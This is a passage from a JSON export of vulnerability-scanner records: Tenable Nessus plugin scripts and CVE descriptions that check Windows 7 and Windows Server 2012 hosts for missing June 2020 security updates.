An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. 
An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\");\n # https://support.microsoft.com/en-us/help/4561669/windows-7-update-kb4561669\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b7da0444\");\n # https://support.microsoft.com/en-us/help/4561643/windows-7-update-kb4561643\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?602a11b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561669 or Cumulative Update KB4561643.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561643',\n '4561669'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561643, 4561669])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:29", "description": "The remote Windows host is missing security update 4561674 or cumulative update 4561612. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561674: Windows Server 2012 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561612.NASL", "href": "https://www.tenable.com/plugins/nessus/137257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137257);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561612\");\n script_xref(name:\"MSKB\", value:\"4561674\");\n script_xref(name:\"MSFT\", value:\"MS20-4561612\");\n script_xref(name:\"MSFT\", value:\"MS20-4561674\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561674: Windows Server 2012 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561674\nor 
cumulative update 4561612. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. 
(CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. 
An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. 
The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. 
(CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)\");\n # https://support.microsoft.com/en-us/help/4561612/windows-server-2012-update-kb4561612\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c1557bf\");\n # https://support.microsoft.com/en-us/help/4561674/windows-server-2012-update-kb4561674\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?003ee4f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561674 or Cumulative Update KB4561612.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is 
Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561612',\n '4561674'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561612, 4561674])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:53", "description": "The remote Windows host is missing security update 